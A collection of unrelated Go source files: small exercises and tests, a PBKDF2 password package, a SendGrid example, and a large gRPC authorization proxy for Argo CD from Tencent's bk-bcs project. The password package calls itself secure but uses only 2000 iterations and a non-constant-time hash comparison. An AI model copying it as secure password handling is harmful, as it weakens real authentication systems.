func(bcs *backendCategoryServer) EditCategory(category backend_model.BackendCategoryModel) (err error) {
return bcd.UpdateCategory(category)
}
// 删除类别
func(bcs *backendCategoryServer) RemoveCategory(categoryId int64) (err error) {
return bcd.DeleteCategory(categoryId)
}
// 根据类别ID 查询分类
func(bcs *backendCategoryServer) GetCategoriesByMenuId(menuId int64) (categories []backend_model.BackendCategoryModel,err error) {
return bcd.FindCategoriesByMenuId(menuId)
} |
package dynamic_programming
import "testing"
func Test_maxProfit(t *testing.T) {
res := maxProfit2([]int{7, 1, 5, 3, 6, 4})
if res != 5 {
t.Error(res)
}
}
|
package balancetests
import (
"bufio"
"fmt"
"os"
"sort"
"testing"
)
const Nodes = 4
var (
filePath string = "./words.txt"
nodeList = make([]string, Nodes)
)
func init() {
for n := range nodeList {
nodeList[n] = fmt.Sprintf("node-%d", n)
}
chInit()
fnv1modInit()
vaporchInit()
}
type method struct {
name string
f func(string) string
}
var methods []method
// Words via https://raw.githubusercontent.com/dwyl/english-words/master/words.txt.
func TestBalance(t *testing.T) {
for _, m := range methods {
nodes := map[string]uint64{}
file, err := os.Open(filePath)
if err != nil {
fmt.Println(err)
os.Exit(1)
}
scanner := bufio.NewScanner(file)
for scanner.Scan() {
nodes[m.f(scanner.Text())]++
}
if err := scanner.Err(); err != nil {
fmt.Println(err)
os.Exit(1)
}
var total float64
var counts []float64
var empty int
for _, v := range nodes {
if v == 0 {
empty++
}
vf := float64(v)
total += vf
counts = append(counts, vf)
}
sort.Float64s(counts)
rng := counts[len(counts)-1] - counts[0]
imbp := rng / total * 100
imbr := counts[len(counts)-1] / counts[0]
fmt.Printf("\n[%s]\n", m.name)
fmt.Printf("%20s - %d\n", "Empty nodes", empty)
fmt.Printf("%20s - portion of keys: %.2f%% / ratio: %.2fx\n",
"Greatest imbalance", imbp, imbr)
fmt.Printf("%20s - %.0f / highest value: %.0f / lowest value: %.0f\n",
"Range", rng, counts[len(counts)-1], counts[0])
if len(nodes) < 16 {
fmt.Println()
for _, n := range nodeList {
fmt.Printf("%s: %d\n", n, nodes[n])
}
}
}
}
|
package main
import (
"testing"
"github.com/stretchr/testify/assert"
)
func TestStart(t *testing.T) {
a := autoAir{}
assert.NotNil(t, a)
}
|
package main
import "fmt"
func main() {
J := "z"
S := "ZZ"
answer := numJewelsInStones(J, S)
fmt.Printf("answer: %d", answer)
}
func numJewelsInStones(J string, S string) int {
js := make(map[int32]bool)
for _, c := range J {
js[c] = true
}
var cnt int
for _, c := range S {
if ok, _ := js[c]; ok {
cnt++
}
}
return cnt
}
|
package kafka
import metrics "github.com/rcrowley/go-metrics"
func init() {
metrics.UseNilMetrics = true
}
|
package password
import (
"crypto/rand"
"crypto/sha256"
"fmt"
"io"
"strings"
"golang.org/x/crypto/pbkdf2"
)
// SecurePassword represents a one-way encypted form of a password. It includes the hash, and
// other information that can be used to regenerate the hash and validate a password.
type SecurePassword struct {
IterationCount int `json:"-"`
Salt []byte `json:"-"`
Hash []byte `json:"-"`
}
// Config contains configuration fields that are required inorder to generate a new SecurePassword.
type Config struct {
saltSize, numIterations, hashLength int
}
var defaultConfig = Config{
saltSize: 16,
numIterations: 2000,
hashLength: 256,
}
// NewSecurePassword uses the default config to generate a new SecurePassword
func NewSecurePassword(password string) (SecurePassword, error) {
config := defaultConfig
return config.NewSecurePassword(password)
}
// NewSecurePassword uses the receiver config to generate a new SecurePassword
func (c Config) NewSecurePassword(password string) (SecurePassword, error) {
var secure SecurePassword
var err error
// Verify that password is not empty
if strings.TrimSpace(password) == "" {
return secure, fmt.Errorf("password is empty")
}
secure.IterationCount = c.numIterations
// Get Salt
secure.Salt, err = getSalt(c.saltSize)
if err != nil {
return secure, err
}
// Get Hash
secure.Hash = getHash(password, secure.Salt, secure.IterationCount, c.hashLength)
return secure, nil
}
// ValidatePassword takes a password and validates that the password produces the same hash i.e. password is valid
func ValidatePassword(sp SecurePassword, password string) bool {
newHash := getHash(password, sp.Salt, sp.IterationCount, len(sp.Hash))
return areEqual(sp.Hash, newHash)
}
// GetHash generates a hash of specified hashLength given the password, the salt and number of iterations to use
// to produce the hash
func GetHash(password string, salt []byte, numIterations int, hashLength int) []byte {
return getHash(password, salt, numIterations, hashLength)
}
// getHash generates a hash of specified hashLength given the password, the salt and number of iterations to use
// to produce the hash
func getHash(password string, salt []byte, numIterations int, hashLength int) []byte {
hash := pbkdf2.Key([]byte(password), salt, numIterations, hashLength, sha256.New)
return hash
}
// GetSalt generates a randomly generated salt of length size
func GetSalt(size int) ([]byte, error) {
return getSalt(size)
}
// getSalt generates a randomly generated salt of length size
func getSalt(size int) ([]byte, error) {
if size < 1 {
return nil, fmt.Errorf("invalid salt size %d", size)
}
salt := make([]byte, size)
n, err := io.ReadFull(rand.Reader, salt)
if err != nil {
return nil, err
}
if n != size {
return nil, fmt.Errorf("number of bytes read %d are not the same as expected size of salt %d", n, size)
}
return salt, nil
}
// areEqual takes two slice of bytes (i.e. two hashes) and returns true if the both hash are equal
// and false if they are not equal.
func areEqual(h1, h2 []byte) bool {
if len(h1) != len(h2) {
return false
}
for i := 0; i < len(h1); i++ {
if h1[i] != h2[i] {
return false
}
}
return true
}
|
package main
import (
"fmt"
"os"
"github.com/sendgrid/sendgrid-go"
)
func main() {
sg := sendgrid.NewSendGridClient(os.Getenv("SENDGRID_USERNAME"), os.Getenv("SENDGRID_PASSWORD"))
message := sendgrid.NewMail()
message.AddTo("eddiezane@sendgrid.com")
message.AddToName("Eddie Zaneski")
message.AddSubject("SendGrid Testing")
message.AddText("WIN")
message.AddFrom("eddiezane@sendgrid.com")
if r := sg.Send(message); r == nil {
fmt.Println("Email sent!")
} else {
fmt.Println(r)
}
}
|
/*
* Tencent is pleased to support the open source community by making Blueking Container Service available.
* Copyright (C) 2019 THL A29 Limited, a Tencent company. All rights reserved.
* Licensed under the MIT License (the "License"); you may not use this file except
* in compliance with the License. You may obtain a copy of the License at
* http://opensource.org/licenses/MIT
* Unless required by applicable law or agreed to in writing, software distributed under
* the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND,
* either express or implied. See the License for the specific language governing permissions and
* limitations under the License.
*/
package argocd
import (
"bytes"
"context"
"encoding/binary"
"fmt"
"io"
"net/http"
"strconv"
"strings"
"github.com/argoproj/argo-cd/v2/pkg/apiclient/application"
"github.com/argoproj/argo-cd/v2/pkg/apiclient/applicationset"
"github.com/argoproj/argo-cd/v2/pkg/apiclient/cluster"
"github.com/argoproj/argo-cd/v2/pkg/apiclient/project"
argorepo "github.com/argoproj/argo-cd/v2/pkg/apiclient/repository"
"github.com/argoproj/argo-cd/v2/pkg/apis/application/v1alpha1"
"github.com/gorilla/mux"
"github.com/pkg/errors"
"google.golang.org/grpc/encoding"
"google.golang.org/grpc/encoding/proto"
"github.com/Tencent/bk-bcs/bcs-common/common/blog"
"github.com/Tencent/bk-bcs/bcs-common/pkg/auth/iam"
"github.com/Tencent/bk-bcs/bcs-scenarios/bcs-gitops-manager/pkg/common"
"github.com/Tencent/bk-bcs/bcs-scenarios/bcs-gitops-manager/pkg/proxy"
mw "github.com/Tencent/bk-bcs/bcs-scenarios/bcs-gitops-manager/pkg/proxy/argocd/middleware"
)
type argoGrpcHandler func(ctx context.Context, req *http.Request) *mw.HttpResponse
var (
// grpcAccessUrl 定义 grpc 模式下准入的 API 列表,及处理方法
grpcAccessUrlHandlers map[string]argoGrpcHandler
)
// GrpcPlugin for internal project authorization
type GrpcPlugin struct {
*mux.Router
middleware mw.MiddlewareInterface
}
// Init the grpc plugin
// 参见: github.com/argoproj/argocd/v2/cmd/argocd/commands
func (plugin *GrpcPlugin) Init() error {
grpcAccessUrlHandlers = map[string]argoGrpcHandler{
"/project.ProjectService/List": plugin.handleProjectList,
"/project.ProjectService/GetDetailedProject": plugin.handleProjectGet,
"/project.ProjectService/Get": plugin.handleProjectGet,
"/repository.RepositoryService/ListRepositories": plugin.handleRepoList,
"/repository.RepositoryService/Get": plugin.handleRepoGet,
"/repository.RepositoryService/ValidateAccess": plugin.handleRepoAccess,
"/repository.RepositoryService/CreateRepository": plugin.handleRepoCreate,
"/repository.RepositoryService/DeleteRepository": plugin.handleRepoDelete,
"/repository.RepositoryService/ListRefs": nil,
"/repository.RepositoryService/ListApps": nil,
"/repository.RepositoryService/GetAppDetails": nil,
"/repository.RepositoryService/GetHelmCharts": nil,
"/cluster.ClusterService/List": plugin.handleClusterList,
"/cluster.SettingsService/Get": plugin.handleClusterSettingGet,
"/cluster.ClusterService/Get": plugin.handleClusterGet,
"/application.ApplicationService/List": plugin.handleAppList,
"/application.ApplicationService/Get": plugin.handleAppGet,
"/application.ApplicationService/Create": plugin.handleAppCreate,
"/application.ApplicationService/Sync": plugin.handleAppSync,
"/application.ApplicationService/Watch": plugin.handleAppWatch,
"/application.ApplicationService/Delete": plugin.handleAppDelete,
"/application.ApplicationService/Update": plugin.handleAppUpdate,
"/application.ApplicationService/UpdateSpec": plugin.handleAppUpdateSpec,
"/application.ApplicationService/Patch": plugin.handleAppPatch,
"/application.ApplicationService/ListResourceEvents": plugin.handleAppListResourceEvents,
"/application.ApplicationService/GetApplicationSyncWindows": plugin.handleAppGetApplicationSyncWindows,
"/application.ApplicationService/RevisionMetadata": plugin.handleAppRevisionMetadata,
"/application.ApplicationService/GetManifests": plugin.handleAppGetManifests,
"/application.ApplicationService/ManagedResources": plugin.handleAppManagedResources,
"/application.ApplicationService/ResourceTree": plugin.handleAppResourceTree,
"/application.ApplicationService/Rollback": plugin.handleAppRollback,
"/application.ApplicationService/TerminateOperation": plugin.handleAppTerminateOperation,
"/application.ApplicationService/GetResource": plugin.handleAppGetResource,
"/application.ApplicationService/PatchResource": plugin.handleAppPatchResource,
"/application.ApplicationService/ListResourceActions": plugin.handleAppListResourceActions,
"/application.ApplicationService/RunResourceAction": plugin.handleAppRunResourceAction,
"/application.ApplicationService/DeleteResource": plugin.handleAppDeleteResource,
"/application.ApplicationService/PodLogs": plugin.handleAppPodLogs,
"/application.ApplicationService/ListLinks": plugin.handleAppListLinks,
"/application.ApplicationService/ListResourceLinks": plugin.handleAppListResourceLinks,
"/applicationset.ApplicationSetService/List": plugin.handleAppSetList,
"/applicationset.ApplicationSetService/Get": plugin.handleAppSetGet,
"/applicationset.ApplicationSetService/Create": plugin.handleAppSetCreate,
"/applicationset.ApplicationSetService/Delete": plugin.handleAppSetDelete,
}
plugin.Path("").Handler(plugin.middleware.HttpWrapper(plugin.serve))
return nil
}
// ServeHTTP http handler implementation
func (plugin *GrpcPlugin) serve(ctx context.Context, req *http.Request) *mw.HttpResponse {
if !proxy.IsAdmin(req) {
return mw.ReturnGRPCErrorResponse(http.StatusForbidden, fmt.Errorf("request not come from admin"))
}
handler, ok := grpcAccessUrlHandlers[strings.TrimPrefix(req.URL.Path, common.GitOpsProxyURL)]
if !ok {
return mw.ReturnGRPCErrorResponse(http.StatusForbidden, fmt.Errorf("request url '%s' unahtourized", req.URL.Path))
}
return handler(ctx, req)
}
// parseRequestBytes GRPC 的前 5 位为 header,第 1 位标注是否压缩, 第 2-5 位标注 body 长度。
func (plugin *GrpcPlugin) parseRequestBytes(request []byte) ([]byte, error) {
if len(request) < 5 {
return nil, fmt.Errorf("request body %v bytes not over 5", request)
}
// NOTE: 默认未压缩,此处不做处理
_ = request[0]
bodyBytes := request[1:5]
bodyLen := binary.BigEndian.Uint32(bodyBytes)
if len(request) < int(bodyLen+5) {
return nil, fmt.Errorf("request body %v not normal", request)
}
return request[5 : bodyLen+5], nil
}
func (plugin *GrpcPlugin) readRequestBody(ctx context.Context, req *http.Request, query interface{}) error {
bs, err := io.ReadAll(req.Body)
if err != nil {
return errors.Wrapf(err, "read request body failed")
}
req.Body = io.NopCloser(bytes.NewBuffer(bs))
body, err := plugin.parseRequestBytes(bs)
if err != nil {
return errors.Wrapf(err, "parse request body failed")
}
if err = encoding.GetCodec(proto.Name).Unmarshal(body, query); err != nil {
return errors.Wrapf(err, "unmarshal request body failed")
}
return nil
}
// rewriteRequestBody 对于 Application Create 需要重写 request body
func (plugin *GrpcPlugin) rewriteRequestBody(req *http.Request, body interface{}) (int, error) {
bodyBs, err := encoding.GetCodec(proto.Name).Marshal(body)
if err != nil {
return 0, errors.Wrapf(err, "encoding request body failed")
}
contentLen := make([]byte, 4)
binary.BigEndian.PutUint32(contentLen, uint32(len(bodyBs)))
result := make([]byte, 0, 5+len(bodyBs))
result = append(result, 0)
result = append(result, contentLen...)
result = append(result, bodyBs...)
req.Body = io.NopCloser(bytes.NewBuffer(result))
return len(result), nil
}
// handleProjectList will handle the grpc request of list project
func (plugin *GrpcPlugin) handleProjectList(ctx context.Context, req *http.Request) *mw.HttpResponse {
projectList, statusCode, err := plugin.middleware.ListProjects(ctx)
if statusCode != http.StatusOK {
return mw.ReturnGRPCErrorResponse(statusCode, errors.Wrapf(err, "list projects failed"))
}
return mw.ReturnGRPCResponse(projectList)
}
// handleProjectGet will return project details by project name
func (plugin *GrpcPlugin) handleProjectGet(ctx context.Context, req *http.Request) *mw.HttpResponse {
query := &project.ProjectQuery{}
if err := plugin.readRequestBody(ctx, req, query); err != nil {
return mw.ReturnGRPCErrorResponse(http.StatusBadRequest, err)
}
_, statusCode, err := plugin.middleware.CheckProjectPermission(ctx, query.Name, iam.ProjectView)
if statusCode != http.StatusOK {
return mw.ReturnGRPCErrorResponse(statusCode, errors.Wrapf(err, "check project '%s' view permission failed", query.Name))
}
return nil
}
// handleRepoList will return repo list
func (plugin *GrpcPlugin) handleRepoList(ctx context.Context, req *http.Request) *mw.HttpResponse {
projectList, statusCode, err := plugin.middleware.ListProjects(ctx)
if statusCode != http.StatusOK {
return mw.ReturnGRPCErrorResponse(statusCode, errors.Wrapf(err, "list projects failed"))
}
names := make([]string, 0, len(projectList.Items))
for _, item := range projectList.Items {
names = append(names, item.Name)
}
repoList, statusCode, err := plugin.middleware.ListRepositories(ctx, names, false)
if statusCode != http.StatusOK {
return mw.ReturnGRPCErrorResponse(statusCode, errors.Wrapf(err, "list repositories failed"))
}
return mw.ReturnGRPCResponse(repoList)
}
// handleRepoGet will return repo details by repo name
func (plugin *GrpcPlugin) handleRepoGet(ctx context.Context, req *http.Request) *mw.HttpResponse {
query := &argorepo.RepoQuery{}
if err := plugin.readRequestBody(ctx, req, query); err != nil {
return mw.ReturnGRPCErrorResponse(http.StatusBadRequest, err)
}
repo, statusCode, err := plugin.middleware.CheckRepositoryPermission(ctx, query.Repo, iam.ProjectView)
if err != nil {
return mw.ReturnGRPCErrorResponse(statusCode, errors.Wrapf(err, "check repo '%s' permission failed", query.Repo))
}
return mw.ReturnGRPCResponse(repo)
}
// handleRepoAccess will check repo access
func (plugin *GrpcPlugin) handleRepoAccess(ctx context.Context, req *http.Request) *mw.HttpResponse {
repoAccess := &argorepo.RepoAccessQuery{}
if err := plugin.readRequestBody(ctx, req, repoAccess); err != nil {
return mw.ReturnGRPCErrorResponse(http.StatusBadRequest, err)
}
if repoAccess.Project == "" {
return mw.ReturnGRPCErrorResponse(http.StatusBadRequest, fmt.Errorf("create repo request project cannot empty"))
}
_, statusCode, err := plugin.middleware.CheckProjectPermission(ctx, repoAccess.Project, iam.ProjectEdit)
if statusCode != http.StatusOK {
return mw.ReturnGRPCErrorResponse(statusCode,
errors.Wrapf(err, "check project '%s' edit permission failed", repoAccess.Project))
}
return nil
}
// handleRepoCreate will create repo to argocd
func (plugin *GrpcPlugin) handleRepoCreate(ctx context.Context, req *http.Request) *mw.HttpResponse {
repoCreate := &argorepo.RepoCreateRequest{}
if err := plugin.readRequestBody(ctx, req, repoCreate); err != nil {
return mw.ReturnGRPCErrorResponse(http.StatusBadRequest, err)
}
if repoCreate.Repo == nil || repoCreate.Repo.Project == "" {
return mw.ReturnGRPCErrorResponse(http.StatusBadRequest, fmt.Errorf("create repo request project cannot empty"))
}
_, statusCode, err := plugin.middleware.CheckProjectPermission(ctx, repoCreate.Repo.Project, iam.ProjectView)
if statusCode != http.StatusOK {
return mw.ReturnGRPCErrorResponse(statusCode,
errors.Wrapf(err, "check project '%s' edit permission failed", repoCreate.Repo.Project))
}
return nil
}
// handleRepoDelete will delete repo from argocd
func (plugin *GrpcPlugin) handleRepoDelete(ctx context.Context, req *http.Request) *mw.HttpResponse {
query := &argorepo.RepoQuery{}
if err := plugin.readRequestBody(ctx, req, query); err != nil {
return mw.ReturnGRPCErrorResponse(http.StatusBadRequest, err)
}
if query.Repo == "" {
return mw.ReturnGRPCErrorResponse(http.StatusBadRequest, fmt.Errorf("delete repo request repo cannot empty"))
}
_, statusCode, err := plugin.middleware.CheckRepositoryPermission(ctx, query.Repo, iam.ProjectView)
if statusCode != http.StatusOK {
return mw.ReturnGRPCErrorResponse(statusCode,
errors.Wrapf(err, "check repo '%s' permission failed", query.Repo))
}
return nil
}
// handleRepoListRefs will list repo refs from argocd
func (plugin *GrpcPlugin) handleRepoListRefs(ctx context.Context, req *http.Request) *mw.HttpResponse {
query := &argorepo.RepoQuery{}
if err := plugin.readRequestBody(ctx, req, query); err != nil {
return mw.ReturnGRPCErrorResponse(http.StatusBadRequest, err)
}
if query.Repo == "" {
return mw.ReturnGRPCErrorResponse(http.StatusBadRequest, fmt.Errorf("delete repo request repo cannot empty"))
}
_, statusCode, err := plugin.middleware.CheckRepositoryPermission(ctx, query.Repo, iam.ProjectView)
if statusCode != http.StatusOK {
return mw.ReturnGRPCErrorResponse(statusCode,
errors.Wrapf(err, "check repo '%s' permission failed", query.Repo))
}
return nil
}
// handleRepoListApps will handle repo list apps
func (plugin *GrpcPlugin) handleRepoListApps(ctx context.Context, req *http.Request) *mw.HttpResponse {
query := &argorepo.RepoAppsQuery{}
if err := plugin.readRequestBody(ctx, req, query); err != nil {
return mw.ReturnGRPCErrorResponse(http.StatusBadRequest, err)
}
if query.Repo == "" {
return mw.ReturnGRPCErrorResponse(http.StatusBadRequest, fmt.Errorf("delete repo request repo cannot empty"))
}
_, statusCode, err := plugin.middleware.CheckRepositoryPermission(ctx, query.Repo, iam.ProjectView)
if statusCode != http.StatusOK {
return mw.ReturnGRPCErrorResponse(statusCode,
errors.Wrapf(err, "check repo '%s' permission failed", query.Repo))
}
return nil
}
// handleRepoGetAppDetails will handle repo get application details
func (plugin *GrpcPlugin) handleRepoGetAppDetails(ctx context.Context, req *http.Request) *mw.HttpResponse {
query := &argorepo.RepoAppDetailsQuery{}
if err := plugin.readRequestBody(ctx, req, query); err != nil {
return mw.ReturnGRPCErrorResponse(http.StatusBadRequest, err)
}
if query.Source.RepoURL == "" {
return mw.ReturnGRPCErrorResponse(http.StatusBadRequest, fmt.Errorf("delete repo request repo cannot empty"))
}
_, statusCode, err := plugin.middleware.CheckRepositoryPermission(ctx, query.Source.RepoURL, iam.ProjectView)
if statusCode != http.StatusOK {
return mw.ReturnGRPCErrorResponse(statusCode,
errors.Wrapf(err, "check repo '%s' permission failed", query.Source.RepoURL))
}
return nil
}
// handleRepoGetHelmCharts will handle repo get helm charts
func (plugin *GrpcPlugin) handleRepoGetHelmCharts(ctx context.Context, req *http.Request) *mw.HttpResponse {
query := &argorepo.RepoQuery{}
if err := plugin.readRequestBody(ctx, req, query); err != nil {
return mw.ReturnGRPCErrorResponse(http.StatusBadRequest, err)
}
if query.Repo == "" {
return mw.ReturnGRPCErrorResponse(http.StatusBadRequest, fmt.Errorf("delete repo request repo cannot empty"))
}
_, statusCode, err := plugin.middleware.CheckRepositoryPermission(ctx, query.Repo, iam.ProjectView)
if statusCode != http.StatusOK {
return mw.ReturnGRPCErrorResponse(statusCode, errors.Wrapf(err, "check repo '%s' permission failed", query.Repo))
}
return nil
}
// handleClusterList will handle cluster list
func (plugin *GrpcPlugin) handleClusterList(ctx context.Context, req *http.Request) *mw.HttpResponse {
projectList, statusCode, err := plugin.middleware.ListProjects(ctx)
if statusCode != http.StatusOK {
return mw.ReturnGRPCErrorResponse(statusCode, errors.Wrapf(err, "list projects failed"))
}
names := make([]string, 0, len(projectList.Items))
for _, item := range projectList.Items {
names = append(names, item.Name)
}
blog.Infof("RequestID[%s] list cluster with projects: %v", mw.RequestID(ctx), names)
clusters, statusCode, err := plugin.middleware.ListClusters(ctx, names)
if statusCode != http.StatusOK {
return mw.ReturnGRPCErrorResponse(statusCode, errors.Wrapf(err, "list clusters failed"))
}
return mw.ReturnGRPCResponse(clusters)
}
// parseClusterName will parse cluster name and check it
func (plugin *GrpcPlugin) parseClusterName(server string) (string, error) {
arr := strings.Split(server, "/")
clusterID := arr[len(arr)-1]
if !strings.HasPrefix(clusterID, "BCS-K8S-") {
return "", errors.Errorf("parse cluster '%s' failed", server)
}
return clusterID, nil
}
// handleClusterGet will handle cluster get, return cluster details
func (plugin *GrpcPlugin) handleClusterGet(ctx context.Context, req *http.Request) *mw.HttpResponse {
query := &cluster.ClusterQuery{}
if err := plugin.readRequestBody(ctx, req, query); err != nil {
return mw.ReturnGRPCErrorResponse(http.StatusBadRequest, err)
}
statusCode, err := plugin.middleware.CheckClusterPermission(ctx, query, iam.ClusterView)
if err != nil {
return mw.ReturnGRPCErrorResponse(statusCode, errors.Wrapf(err, "check application '%s' permission failed", query.Name))
}
return nil
}
func (plugin *GrpcPlugin) handleClusterSettingGet(ctx context.Context, req *http.Request) *mw.HttpResponse {
return nil
}
// handleAppSetList will handle applicationSet list, return applicationSets
func (plugin *GrpcPlugin) handleAppSetList(ctx context.Context, req *http.Request) *mw.HttpResponse {
projectList, statusCode, err := plugin.middleware.ListProjects(ctx)
if statusCode != http.StatusOK {
return mw.ReturnGRPCErrorResponse(statusCode, errors.Wrapf(err, "list projects failed"))
}
query := new(applicationset.ApplicationSetListQuery)
if err := plugin.readRequestBody(ctx, req, query); err != nil {
return mw.ReturnGRPCErrorResponse(http.StatusBadRequest, err)
}
names := make([]string, 0, len(projectList.Items))
if len(query.Projects) != 0 {
queryProjects := make(map[string]struct{})
for _, pro := range query.Projects {
queryProjects[pro] = struct{}{}
}
for i := range projectList.Items {
item := projectList.Items[i]
if _, ok := queryProjects[item.Name]; ok {
names = append(names, item.Name)
}
}
} else {
for i := range projectList.Items {
item := projectList.Items[i]
names = append(names, item.Name)
}
}
appsetList, err := plugin.middleware.ListApplicationSets(ctx, names)
if err != nil {
return mw.ReturnGRPCErrorResponse(http.StatusInternalServerError,
errors.Wrapf(err, "list applicationsets by project '%s' from storage failed", names))
}
result := make([]v1alpha1.ApplicationSet, 0, len(appsetList.Items))
for i := range appsetList.Items {
item := appsetList.Items[i]
result = append(result, item)
}
appsetList.Items = result
return mw.ReturnGRPCResponse(appsetList)
}
// handleAppSetGet handle application get, return application details
func (plugin *GrpcPlugin) handleAppSetGet(ctx context.Context, req *http.Request) *mw.HttpResponse {
query := &applicationset.ApplicationSetGetQuery{}
if err := plugin.readRequestBody(ctx, req, query); err != nil {
return mw.ReturnGRPCErrorResponse(http.StatusBadRequest, err)
}
statusCode, err := plugin.middleware.CheckGetApplicationSet(ctx, query.Name)
if err != nil {
return mw.ReturnGRPCErrorResponse(statusCode,
errors.Wrapf(err, "check applicationset '%s' failed", query.Name))
}
return mw.ReturnArgoReverse()
}
// handleAppSetCreate handle application create
func (plugin *GrpcPlugin) handleAppSetCreate(ctx context.Context, req *http.Request) *mw.HttpResponse {
appCreate := &applicationset.ApplicationSetCreateRequest{}
if err := plugin.readRequestBody(ctx, req, appCreate); err != nil {
return mw.ReturnGRPCErrorResponse(http.StatusBadRequest, err)
}
statusCode, err := plugin.middleware.CheckCreateApplicationSet(ctx, appCreate.Applicationset)
if err != nil {
return mw.ReturnGRPCErrorResponse(statusCode, errors.Wrapf(err, "check create applicationset failed"))
}
contentLen, err := plugin.rewriteRequestBody(req, appCreate)
if err != nil {
return mw.ReturnGRPCErrorResponse(http.StatusBadRequest, errors.Wrapf(err, "rewrite request body failed"))
}
req.Header.Set("Content-Length", strconv.Itoa(contentLen))
req.ContentLength = int64(contentLen)
return mw.ReturnArgoReverse()
}
// handleAppSetDelete will handle application delete
func (plugin *GrpcPlugin) handleAppSetDelete(ctx context.Context, req *http.Request) *mw.HttpResponse {
appDelete := &applicationset.ApplicationSetDeleteRequest{}
if err := plugin.readRequestBody(ctx, req, appDelete); err != nil {
return mw.ReturnGRPCErrorResponse(http.StatusBadRequest, err)
}
statusCode, err := plugin.middleware.CheckDeleteApplicationSet(ctx, appDelete.Name)
if err != nil {
return mw.ReturnGRPCErrorResponse(statusCode, errors.Wrapf(err, "check delete applicationset failed"))
}
return mw.ReturnArgoReverse()
}
// handleAppList will handle application list, return applications
func (plugin *GrpcPlugin) handleAppList(ctx context.Context, req *http.Request) *mw.HttpResponse {
projectList, statusCode, err := plugin.middleware.ListProjects(ctx)
if statusCode != http.StatusOK {
return mw.ReturnGRPCErrorResponse(statusCode, errors.Wrapf(err, "list projects failed"))
}
query := new(application.ApplicationQuery)
if err := plugin.readRequestBody(ctx, req, query); err != nil {
return mw.ReturnGRPCErrorResponse(http.StatusBadRequest, err)
}
names := make([]string, 0, len(projectList.Items))
if len(query.Projects) != 0 {
queryProjects := make(map[string]struct{})
for _, pro := range query.Projects {
queryProjects[pro] = struct{}{}
}
for i := range projectList.Items {
item := projectList.Items[i]
if _, ok := queryProjects[item.Name]; ok {
names = append(names, item.Name)
}
}
} else {
for i := range projectList.Items {
item := projectList.Items[i]
names = append(names, item.Name)
}
}
appList, err := plugin.middleware.ListApplications(ctx, names)
if err != nil {
return mw.ReturnGRPCErrorResponse(http.StatusInternalServerError,
errors.Wrapf(err, "list applications by project '%s' from storage failed", names))
}
result := make([]v1alpha1.Application, 0, len(appList.Items))
for i := range appList.Items {
item := appList.Items[i]
if query.Name != nil && (*query.Name != "" && *query.Name != item.Name) {
continue
}
if query.Repo != nil && (*query.Repo != "" && *query.Repo != item.Spec.Source.RepoURL) {
continue
}
if query.AppNamespace != nil && (*query.AppNamespace != "" && *query.AppNamespace !=
item.Spec.Destination.Namespace) {
continue
}
result = append(result, item)
}
appList.Items = result
return mw.ReturnGRPCResponse(appList)
}
// handleAppGet handle application get, return application details
func (plugin *GrpcPlugin) handleAppGet(ctx context.Context, req *http.Request) *mw.HttpResponse {
query := &application.ApplicationQuery{}
if err := plugin.readRequestBody(ctx, req, query); err != nil {
return mw.ReturnGRPCErrorResponse(http.StatusBadRequest, err)
}
_, statusCode, err := plugin.middleware.CheckApplicationPermission(ctx, *query.Name, iam.ProjectView)
if err != nil {
return mw.ReturnGRPCErrorResponse(statusCode,
errors.Wrapf(err, "check application '%s' permission failed", *query.Name))
}
return nil
}
// handleAppCreate handle application create
func (plugin *GrpcPlugin) handleAppCreate(ctx context.Context, req *http.Request) *mw.HttpResponse {
appCreate := &application.ApplicationCreateRequest{}
if err := plugin.readRequestBody(ctx, req, appCreate); err != nil {
return mw.ReturnGRPCErrorResponse(http.StatusBadRequest, err)
}
statusCode, err := plugin.middleware.CheckCreateApplication(ctx, appCreate.Application)
if err != nil {
return mw.ReturnGRPCErrorResponse(statusCode, errors.Wrapf(err, "check create application failed"))
}
contentLen, err := plugin.rewriteRequestBody(req, appCreate)
if err != nil {
return mw.ReturnGRPCErrorResponse(http.StatusBadRequest, errors.Wrapf(err, "rewrite request body failed"))
}
req.Header.Set("Content-Length", strconv.Itoa(contentLen))
req.ContentLength = int64(contentLen)
return mw.ReturnArgoReverse()
}
// handleAppSync will handle application sync
func (plugin *GrpcPlugin) handleAppSync(ctx context.Context, req *http.Request) *mw.HttpResponse {
query := &application.ApplicationSyncRequest{}
if err := plugin.readRequestBody(ctx, req, query); err != nil {
return mw.ReturnGRPCErrorResponse(http.StatusBadRequest, err)
}
return plugin.handleAppCommon(ctx, *query.Name, iam.ProjectEdit)
}
// handleAppDelete will handle application delete
func (plugin *GrpcPlugin) handleAppDelete(ctx context.Context, req *http.Request) *mw.HttpResponse {
appDelete := &application.ApplicationDeleteRequest{}
if err := plugin.readRequestBody(ctx, req, appDelete); err != nil {
return mw.ReturnGRPCErrorResponse(http.StatusBadRequest, err)
}
return plugin.handleAppCommon(ctx, *appDelete.Name, iam.ProjectEdit)
}
// handleAppWatch will handle application watch
func (plugin *GrpcPlugin) handleAppWatch(ctx context.Context, req *http.Request) *mw.HttpResponse {
appWatch := new(application.ApplicationQuery)
if err := plugin.readRequestBody(ctx, req, appWatch); err != nil {
return mw.ReturnGRPCErrorResponse(http.StatusBadRequest, err)
}
return plugin.handleAppCommon(ctx, *appWatch.Name, iam.ProjectEdit)
}
// handleAppUpdate will handle application update
func (plugin *GrpcPlugin) handleAppUpdate(ctx context.Context, req *http.Request) *mw.HttpResponse {
appUpdate := &application.ApplicationUpdateRequest{}
if err := plugin.readRequestBody(ctx, req, appUpdate); err != nil {
return mw.ReturnGRPCErrorResponse(http.StatusBadRequest, err)
}
return plugin.handleAppCommon(ctx, appUpdate.Application.Name, iam.ProjectEdit)
}
// handleAppUpdateSpec will handle application update spec information
func (plugin *GrpcPlugin) handleAppUpdateSpec(ctx context.Context, req *http.Request) *mw.HttpResponse {
appReq := new(application.ApplicationUpdateSpecRequest)
if err := plugin.readRequestBody(ctx, req, appReq); err != nil {
return mw.ReturnGRPCErrorResponse(http.StatusBadRequest, err)
}
return plugin.handleAppCommon(ctx, *appReq.Name, iam.ProjectEdit)
}
// handleAppPatch handle application patch
func (plugin *GrpcPlugin) handleAppPatch(ctx context.Context, req *http.Request) *mw.HttpResponse {
appReq := new(application.ApplicationPatchRequest)
if err := plugin.readRequestBody(ctx, req, appReq); err != nil {
return mw.ReturnGRPCErrorResponse(http.StatusBadRequest, err)
}
return plugin.handleAppCommon(ctx, *appReq.Name, iam.ProjectEdit)
}
// handleAppListResourceEvents handle application list resource events
